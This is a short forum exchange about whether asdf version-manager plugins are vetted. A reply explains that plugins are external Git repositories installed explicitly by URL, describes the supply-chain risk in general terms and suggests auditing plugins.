anyone know if there is a vetting procedure for inclusion of new plugins for asdf. I'd like to recommend use of asdf, but our security people want to know how hard it would be for someone to add a plugin to install malicious software.
or is there a better place to ask?
asdf plugins are never included in asdf-vm core. When you install asdf on a machine it by default includes no plugins. All plugins are installed manually from an external source. The safest way of installing a plugin is via the explicit
asdf plugin-add <name> <url>syntax. For example, to install the Ruby plugin maintained by the asdf core team run the following command:How hard would be for someone to create a plugin to install malicious software? Plugins are just Git repos with callback scripts in them. It would be as easy as publishing a Git repo to Github with malicious software. The challenge for an attacker would be convincing developers to install it. This is similar to most open source software today. Creating something bad is easy, getting developers to use it is tricky.
There a sort of "plugin repo" - https://github.com/asdf-vm/asdf-plugins but using anything in it still requires you to run
asdf plugin-add <plugin name>. We are working on phasing this out as it appears to be "official" but in reality is not maintained by the core team. In the future only the explicitasdf plugin-add <name> <url>syntax will work. Additionally, in the future we'll have explicit versioning for plugins, so upgrades to plugins will be easier to track.Nothing prevents you from auditing open-source asdf plugins yourself. If your team has a few plugins they'd like to use, auditing the code manually or via a security tool should be easy to do.